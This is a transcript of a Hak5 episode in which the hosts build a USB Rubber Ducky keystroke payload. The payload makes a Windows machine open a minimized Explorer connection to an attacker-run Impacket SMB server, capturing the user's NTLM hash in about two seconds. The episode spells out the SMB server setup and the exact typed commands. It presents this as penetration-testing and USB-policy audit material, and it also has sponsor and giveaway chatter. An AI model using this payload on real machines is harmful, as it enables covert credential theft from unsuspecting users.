Last week, we showed off a USB rubber ducky payload to steal plain text Windows passwords in 15 seconds. So what if I told you we can get just the logon hash in under 2? That's right, a 2-second technique for stealing Windows password hashes and otherwise auditing corporate USB drive policies. All that and more this time on Hack 5.
Hello and welcome to Hack 5. My name is Darren Kitchen.
I'm Shannon Morse.
It's your weekly dose of Technolust.
I was totally thinking about cutting you off.
Knew you were about to steal it. I'm proud to be her co-host. What an amazing fun time it has been recently. We had a great time last week with that Mr. Robot password password stealing Mimikatz payload of doom.
Yeah, last week we showed off the technique using Invoke Mimikatz and PowerShell to steal plain text Windows passwords in 15 seconds. It's a great payload, but it does require a little bit of time with the victim PC. So to take it a step further, we're going to be looking at a technique to steal just the password hash in under 2 seconds, leaving extremely little time to defend against the attack.
Yes.
I love this idea.
This is going to be fun.
Super, super awesome.
Right? So a little bit of theory behind this one, yeah?
Can we stickers? Can we do stickers?
Oh, do we have stickers?
We have stickers.
All right, we're going to do that. We're going to get into the theory, and then we're going to build on the hack. But I assume we have stickers.
We have stickers.
All
well,
right.
We have a ton of stickers, but most of these are duplicates. These are actually from our friend who gave all of them to us at DEF CON.
Wow,
I know, there's
this is a lot of stickers.
So one of the guys that wrote
stickers.
this book, his name is Bo Weaver, and this is called Kali Linux 2 Windows Penetration Testing. He dropped by our booth and he said he was a big fan of the show, and he gave us copies of his books, and he even signed them on the bottom, and he gave us all these awesome stickers to put on our wall. So I wanted to give him a little bit of pimpage there. And toss on a few of his stickers on our sticker wall back here because I thought it was really cool, and I'm a huge bookworm, so I'm really excited to get my learn on with some more penetration testing. I'm very, very excited about that. What do we have
Me too.
here?
What are I don't even know.
I like this one that says hacked.
Oh, that's brilliant. I just want to put that on everything.
I do too.
Here, I'm going to put the red.
It's in like Archer script too. That's great. Right there? Okay.
Right there.
Yeah.
Okay.
Hacked.
Yes. No.
Not really.
Right?
I'm actually like the most secure of
exfoliate.
anybody
There you go.
at the convention.
Yeah.
Do you know I brought a Faraday cage
I
with me
noticed that. That was fun.
to DEF CON?
Wow. Okay, so we'll get into the rest of these stickers
Yeah, we'll
towards
put the
the end
rest of
because
them
that's awesome. Thanks for sending those by. And
Yes, thank
cool
you, Bo.
book. Exciting.
Awesome. So cool.
Right?
All right, so moving on to the theory.
So password hashes, right? We've talked about these in the past. We've done a couple of episodes on password cracking, password hash cracking, and we talked about that a little bit last week when we were talking about Mimikatz and how it not only gets those LM and NTLM hashes that we're familiar with, but also the plain text passwords. So that takes a little bit of doing, and if you just want something a little bit more covert, something that happens like real quick without the ability for the user to get interactive and stop it, because it does take like 15 seconds. So with that command window up, you can obfuscate it, you can minimize it, but still, like if a user was like, oh no, what's happening, and closed it, then it could be a bad day.
Of course.
But we can get the hash in just like a blink of an eye, and then it's like, wait a second, what just happened, right? So I'm going to show how that works, but we do need to understand a little bit about Windows shares, which we use here at the studio.
Yes, we do.
SMB, or Server Message Block, sometimes called CIFS, or Common Internet File System. It's predominantly a Windows thing. We're talking about Microsoft Windows Networks here. We're talking about the file sharing that we know and love on TCP port 445, which is typically blocked on the internet, but you'll see why if you're doing a pen test, this is the quickest way to get a hash. So let's go ahead and talk about, well, let me show you an example because you've probably already seen this. So on the right, I have my boring Windows box, and on the left, I've got my Kali Linux box. And I'm just going to go ahead and pull up the run line, or I could do this straight from Explorer. But if you just type in / an IP address, so in this case 10.73.31.74, we have a NAS here at the studio.
So in this case, it brings up our NAS.
Exactly. You'll notice the first thing it wants to do is log in. Now here's the thing, if it's a domain, a lot of times it's going to go ahead and just like send the credentials that it has on file. If obviously this isn't accepting the credentials it has on file for this particular user, this user is, who am I, is DK on this workstation, right? So the workstation is named win dash all that stuff, and the username is DK. And as we saw last week, the password is lame password.
So your NAS isn't recognizing this workstation?
No, because, well, if the NAS, for instance, had a user called DK with the password lame password, it would have authenticated.
Oh.
Our NAS doesn't. So I have to go back here and I'll be like Darren, and I'll just, log in, and you'll see that there we go. Here's, here's our NAS.
All of our shows.
Right, here's all our shows. I can go into Hacktip and check out episodes of Hacktip. Anyway, that's how we organize our stuff here at Hack5. But part of that process is to authenticate. So we're going to use that to our advantage. And we're going to do it with Samba.
Oh, yay,
Because remember how
Samba.
last week we were talking about going to Vienna and how we're going to do the waltz? I figured that you would like to Samba.
Oh my gosh, I'm leaving right now.
Okay, so Samba is a free software implementation of SMB for Unix, Linux, Solaris, BSD, etc. And Core Security. I love those guys. They host this thing called Impact. You can come back. It's okay. I'm not going to try to dance with you.
Okay.
We might tango later. No, I'm not going to. Okay. Trying to tell them.
I don't like dancing, man.
All
You can
right.
dance with your imaginary friend over there.
There you go. Okay. Does that mean that, anyway, later. So, Impact. Impacket. Impacket. We're off the rails a little bit. So Core Security, awesome guys. They host this thing on their GitHub called Impacket. Is a collection of Python scripts for working with network protocols. And it's a fantastic resource if you want to start getting into, well, playing around with all sorts of fun, nefarious stuff. So I'll go into Impacket here, and you'll see that there's all of these examples. One of which, if I go down here, SMB, there's a Karma SMB, that's a fun one for another time. We've got SMB clients, we've got SMB servers. This is really great for doing some research. So one of the fun things that we're going to be able to do is run our own SMB server, kind of like a fake, well, it's a real SMB server, but we're going to do it in Linux, and we're going to be able to capture credentials with it, because part of that initiation of opening an SMB share is to send over our authentication hash, right?
So vulnerable.
Yes,
That's
I know.
awesome.
So let's go ahead and do exactly that.
Okay.
I actually have, if I switch over to Impacket ls, and you'll see here we have all of these different examples, and I'm just going to go ahead and run /smb server. Okay, so here's how you run SMB server. And in fact, I'll just make this a little bit smaller so we can read that. So what we'll need to do is we need to pass it basically a share name and a share path. We can add comments if we really want, or any of that stuff. So for the share name, I'll call it TMP, and for the path, I'll point it to /temp, because I really don't care about what's actually there. If I cared, I might make a directory. In fact, this is something where we might make a directory hosting some malware, just to point that out. But when I go ahead and run this, you'll see I now have an SMB server running. Okay, cool. So if I now go to my Windows machine, pull up that run line, and type in // the IP address of this server. Let's see what the IP address is. Ifconfig /0. It is 1073.31.136, right? So I'm going to leave this open, and notice this SMB server running right here, 10.73.31.136.
Oh.
Boom. Well, there it is. There's TMP, and I can go in there, and here's the actual storage from that computer, which is great if you want to quickly transfer some files to a Windows box. But you notice something. We got this authentication message, incoming message from, and this is the IP address of this Windows box. And we got the user DK at that workstation, and then it authenticated, and then here's our hash. So check that out.
So we should mention that we have done episodes on hashes previously. There's a couple that we did. It was season 9, episode 12, and then season 12, episode 18, and we'll put those in cards over here on YouTube in case you're watching on YouTube. Should probably do a follow-up on those.
We really should. That would be a good idea.
It's been a while.
It has been, right? I mean, we've been doing this for 11 years, but and there's a lot of cool different techniques and things that you can do with hashes that you might not be aware of. So I'm excited about this because this is the perfect example of a payload. We're now going to turn this into a USB rubber ducky payload that'll happen in the blink of an eye and help you on your next engagement audit USB policies, because we've all seen that story of like, oh, we'll litter the parking lot with USB drives and see who plugs one in, right? Well, this is brilliant because we literally know who plugs one in this instance because it
Right.
sends the user and the workstation and the timestamp, and bonus, we get the hash. So this is a really fantastic and quick and easy payload that you can use to find out who's plugging in to what workstations when USB drives that they shouldn't be plugging in at the corporate environment. Should mention though, this does require running a Samba server on that corporate network.
Okay. Good to
So
know.
the reason for that is most internet service providers are going to block port 445 or 455, 445. Anyway, they're going to block SMB.
Okay.
So you're not going to be able to, like, say, host this up in the cloud. So again, this is for a lawful audit. This is for like, hey, you've been, contracted to
absolutely.
audit this organization. And this is one of my favorite payloads because it was requested of us last year by a major bank that littered these around all of their branch offices and was able to tell who's being naughty.
Oh, wow. That's so bad.
So let's turn this into a USB rubber ducky script and payload in mayhem.
Right after the break.
When you've got that great idea like owning a computer in 15 seconds or less, you know that you need to bring it to the interweb and share it with the world. So please do what Shannon and I do, and that's head over to domain.com. These guys have an awesome domain discovery system that'll help you choose the right domain, and their easy checkout process will have your website up and online in no time flat. And get this, the guys over at domain.com, huge fans of Hack5 and you guys, so we have a special coupon code just for you. It's HAK5. That spells Hack5, and it'll also save you 20% at checkout. So check that out. Isn't that awesome? Guys at domain.com are huge fans, and we want to show them support. So even if you don't need a domain this exact moment, you should tweet them at domain.com and say, hey, thanks for supporting Hack5 all these years. And when you think domain names, think domain.com.
We're now back, and it's time to turn this into a ducky payload.
Wahoo! All right. Very similar to how we did last week. In fact, I think this is a fantastic, and
Yes.
it's a fantastic example of how we can go ahead and iterate on developing USB rubber ducky payloads. And so if we take a look at my computer, you'll see that I have kind of, the whole instance set up. I've got my, the Impacket SMB server Python script running on my Kali box on the left. And then I love using VMs for this because I can pull this up and test it. And as we saw, there we go, it works. It's important to go ahead and do that because now I can retrace those steps. So in a new window, I'm going to go ahead and open Nano, and we're going to call this SMB hash grab.txt. Sure. Okay, and so I'm going to start developing my ducky script. First thing, of course, is give it a comment. I don't know. Cool. And then we'll say, and then we'll do that initial delay of, of 1 second. So after that, what did we do on the Windows host? Well, we held down Windows key and hit R. That's how a lot of payloads begin to get that run line.
Yep.
So it's going to be GUI and the R key. Then after that, we're going to need to start typing in something. So let's see, GUI R. Well, we should probably delay just in case it takes a second for that to show up, but really not long, like 1/10 of a second is fine. So delay for 100 milliseconds. Then, well, we know that it worked if we just typed in / that IP address. So string / 1073.31.136. Okay. Then after that, what do we need to do? Well, we need to hit enter. So hit enter, it pops up, good to go. Okay, cool. So let's see, enter. Well then, let's see, so let's do that again. So I keep iterating. I keep doing this on the left, and then I'm like testing it on the right. Okay, so once I hit enter, this pops up. Should probably delay for, I don't know, like 500, half a second for that to make that network connection. And now I've got this open, and I'm like, okay, well, it's time to close it. A couple of ways to close a window in Windows. If you've ever been on IRC, you know the quickest way to get ops is hold down Alt and hit F4, and that's what we're going to do today.
Oh.
Another way to do it is to hold down Alt and space, and you'll get this right here, and you can see it's Alt F4. Or you see how C is underlined? We could hit C. So do that again, Alt space, just like we could also hit N for minimize, or X for maximize, or M for move. Okay. So, however you want to do that. My preference is just literally Alt F4, which, boop, which, boop. There we go. Okay, so in that case, it'll just be Alt F4. Cool. And we're good to go. That's the entire, so save that out. That is our 10-line ducky script, 2 of which are just comments. So I'm going to go
So
ahead
easy.
and mount that SD card from the USB rubber ducky into that virtual machine. And I'm going to go ahead and encode it. So we see that it just popped up. I'm going to do java tac.jar duck-encode.jar. Our input file is that SMB hash. And then tac-o for our output is going to be /media/root. And then I'm just going to overwrite that file. So I'm just doing that all in one command.
Okay.
And now I just need to safely eject this. So I'm just going to kind of recycle this, back all that out, and say eject. Great. So now that's
Cool.
ejected. I can go ahead and unplug this, switch over to my Windows box. Let me pull up this and close that out, and clear it, and restart. OK, so I got my SMB server going. Now I'm just going to go ahead
Do you
and
have to click back into the
Yes.
Windows?
So when I'm testing, I'm using virtual machines here because it makes it really easy for me to go back and forth between Kali and whatnot without having to have physical machines. So if I were to, say, click into the Kali box and then plug the USB rubber ducky into my laptop.
It's going to open up in the Kali box, not the Windows one. Okay.
So I'll just go ahead and click over to my Windows box and plug it in. So as soon as we plug it in, there we go.
Ah,
and it closed
cool.
it. Boom. So that was pretty quick.
Wow, that was really
Right?
quick.
I think we can make it slightly better. And this is the fun thing about building duck scripts is you're like, every time you make one,
You can
then-
make it faster.
Make it
Over
faster.
9,000.
Exactly. So let's do just that.
Okay.
Okay, so same process, lather, rinse, repeat. Grab our SD card out of the duck, pop it in the reader, switch over to our Kali side, plug in that reader so we can go ahead and replace that. And let me work on that duck script a little bit. Let me use Nano to open up SMB hash grab. And instead of this string, I'm going to get rid of everything after that. Instead of this string of just pulling up that //7, you know, that SMB server, we're going to actually use CMD. And I'm doing this on the Windows side live so you can see what's going to happen. CMD has a couple of different options. I'll give you an example. /k, if I did /k dir, what that's going to do is it's going to open the command prompt and run dir and then close, and then stay open,
Yeah.
right? I could also do tree. I wonder if I can tree // so it's a little longer. Tree // Yeah, okay, so tree // is an awesome command that you should do and full screen at the office so it makes it look like you're a KRAD Ultra Elite Hacksaw.
Right.
You'll notice that when it finishes, it leaves the command prompt open. Let's run that same command again, but this time, instead of /k, let's do /C. And it runs tree just like before,
Cool.
and then closes when it's done,
Oh,
right? That's what this
so C is for close?
C is for close, K is for keep, I guess.
Okay.
But what this means is we can now pass it something and have it like pop up and then disappear immediately.
Ooh.
The reason for this is we are going to use the
Hacks.
start command. Okay, so fun thing about start is it's been in Windows since Windows 95.
Yeah.
I'll show you an example of this command. I'm going to open up CMD and I'm just going to say start dot. Now, as we know from Unix and Linux and everything else, dot is the current working directory.
Yeah.
So if I hit start dot, it just opens up the current directory in Explorer.
Oh.
Interesting, right? Start has all of these different, things that you can do, right? So you can specify all of this stuff. Notice this one, /min. So we can do
Minimize?
Exactly.
Okay.
So I'll get through all that and we'll do clear. Sorry, it's not clear, it's CLS on DOS. We'll do start space /min dot. Well, nothing happened, right?
Yeah.
No, something did. Notice that the Explorer is now open, and there it
okay.
is. Let me close that and do that once
So the
more. So you can
Explorer
see
minimized.
Explorer isn't open, but when I run that, now Explorer is, but
So
it's
it
minimized.
opens and minimized.
So it doesn't like pop up and then minimize. It opens it minimized.
Yeah. That's
See where this is going?
Yeah, I do. That's
All right,
cool.
so let's
Okay.
put it all together, right? So if I come back over here, what I'm going to want to do now is couple both that start command and Explorer and our Samba share and that CMD/C. So it'll be CMD/C. What are we going to do? Well, we're going to run the command start with /min, and then, well, we're going to open Explorer or Explorer.exe. I'm not going to do the .exe because we don't need to, and it'll save a few characters. And then we're going to pass it where we want it to go. So in this case, 10.73.31.136. And my quotation marks, let me switch back over to here so you can see it authenticate when we open. And let me close Explorer so you'll see that Explorer isn't open. And when I hit OK, nothing popped up on the screen, but we still got our information.
Yeah.
Which is really cool. Well, it is if we click on this, right? So it's one of those things where we put this together and, well, let's just do it and you'll see like how quick, and then we'll talk about ways to improve upon that, which may be an exercise for the viewer.
All right.
Okay, so let's come back over to that duck script and replace that string with cmd /C quote start, and then what do we want to do? We want to start at minimize, so /min Explorer, and then we're sending this as a parameter to Explorer, that // in our server. And of course, that'll be the server that you specify when you set it up on your target.
And then end quotes, right?
Enter quotes.
Okay.
And then after that, we just have enter, and that's it. So now we'll save that file out. So let's just like we did before, we'll just recycle that command. That just replaced the inject.bin on the SD card.
Okay.
And now let's eject the reader again. And now I'm just going to unplug that, switch over to my Windows box, make that the active window. Great. Pop my SD card in the duck. And when I plug the duck into the computer now, that was it. That was the entire
Really?
Like, I think it might actually be less
so
than
good.
2 seconds. And if we switch back over to Impact it, you'll see, there we go, we have credentials again.
That's hilarious.
Another fun thing about
I
the
love
duck
it.
is if you press the button on it, it replays the payload.
Yeah.
So I'll just go back over here and I'll press the button. And there we go. Like, that was really short.
I
Okay.
love that. That's so good.
We did leave a Samba Share open minimized.
Yeah.
Chances are they're not going to notice it. Eventually they may click it, in which case, well, instead of sharing /TMP, share something and then name it totally legit. Don't ask questions.
Right, of course.
Everything's good.
Yeah.
.exe,
Don't unplug
run
this.
that. Exactly. Don't unplug this.
Don't unplug this
Trust
thing.
me, no one is going to.
That's really cool.
Whatever it is, no one's going to unplug it. Yes.
So we'll have this all written up in our show notes, which you can find below the episode if you're watching this in the browser. And of course, if you're on our YouTube channel, you can find all of our previous episodes in the show notes, as well as cards over on that side, I believe.
Yes. I feel really good about this one, but you know what I'm looking forward to?
What?
Somebody to comment below and be like, dude, I got it down to
I got it
half
faster.
a second.
Yep.
So that's always the fun part about
You know,
that.
somebody will come up with that.
Yes, absolutely.
So funny. Oh man. Okay. Well, I think it's time for our next Technolist photo of the week. What do you think?
Absolutely. Let's
Yeah?
do it.
You ready for it? All right. So every week we are asking what tickles your Technolist. You can tweet us, Instagram us, or Facebook us with a hashtag hack5, HAK5, for your chance to win some awesome gear from the Hack Shop. You don't have to @reply us or anything. Just hit hashtag hack5 and we'll be able to find them. So today we are giving out a Wi-Fi Pineapple Nano,
Ooh, as well as the Wi-Fi pineappling
new book.
right? So
which Darren wrote.
and Shannon
awesome.
edited, and it's so awesome because you can just get this and walk away with all the confidence on all of the ways to, do great
Very
stuff
cool.
with the Wi-Fi pineapple. So
Very, very
they
cool.
go very well together, in fact.
I think I get to choose this week.
All right, so what did you
So
find?
mine actually sent us 3 pictures.
Oh, okay.
Yeah, and he just sent them, so
Let's
we might
see
get
'em.
more. All right, so the first one is from IR Jody Taylor, and he said, @Hack5Darren, out of the Pro Kit I bought from Snubs at DEF CON 20. So this is our older pineapple.
Oh, that's the Wi-Fi Pineapple Mark IV, but what is that on?
So this is actually on, I'll show you the next picture. So
Oh,
you probably
hey.
recognize him.
Yes,
Right? So
because I'm a huge Star Trek
See what he's
fan.
holding?
Right, and I
there?
actually, hey, you know what? I actually thought Voyager was pretty good, so, no flame, no flame.
I'm currently going through the Next Generation again, but I'll get there. So yeah, this is Garrett Wang, the guy who starred in Star Trek, and it's Ensign Harry Kim unknowingly scanning everyone
Well,
in
he's
proximity.
okay. So it's a tricorder.
It's a tricorder.
That is
yes.
fantastic.
So he modded it and put it inside of a tricorder.
Scanning for life
So
signs
funny.
with a pineapple.
But he's not done yet.
Oh no?
No, he's
Uh-oh.
not. So the next picture he sent, he said, what I'll be working on next, assuming the next pineapple can be squeezed into a medical tricorder.
Oh, right? Oh, well, in that case.
I love that. So
Scanning for
perfect.
life forms. Yes.
So great.
Let's
so
do that.
yeah, that is my pick for this week. So Jody, we're going to send you you a Wi-Fi Pineapple Nano so you can stick that inside the medical tricorder and take it to your next, I don't know, wherever you meet Star Trek celebrities.
There you go. Yes, and
met
then
Worf once.
make sure you do Mr. Tricorder. That's classic. Classic.
Engage.
Yes. With all of that said, if you would like to also get some awesome, cool, fun, swag fun gear that we make here at Hack5, like the USB rubber ducky that we just demonstrated, or the Wi-Fi Pineapple, which Jody just won, or of course our land turtle, you can find those over at hakshop.com. We value your support making this show happen and allowing us to live that dream. So check out the cool pen test gear over at hackshop.com.
And if you're interested in hanging out with us at the next convention that we're going to hang out at, or the next meetup that we're deciding to have, you can hit us up over at hak5.org. That's where we put all of our calendar things that are happening in the next couple of months. So I believe we have a few different links below as far as going to DerbyCon. So that'll be happening pretty soon, and I believe you're going somewhere as well.
Yeah, we're going to be doing TorCon, and then there's DeepSec in Vienna in November, and
So cool.
who knows, so many great opportunities. You can find links to all of our social networks and all of that good stuff over at hak5.org, as well as all of our shows, so the Metasploit Minutes and the Threat Wires and the Tech
Yay.
Things and the Hack5 and the Hack Tips. So thank you so much.
And then feedback at hack5.org is where you can email us. And yay, I think that's it.
I think that is. Okay, well, with all of that said, I'm Darren Kitchen.
I'm Shannon Morse.
Trust your Technolist.
Engage. We are back. Bleh. Oh my gosh, it sounded like I was speaking backwards. Shut up, Wesley.
Yeah, that.
Satan.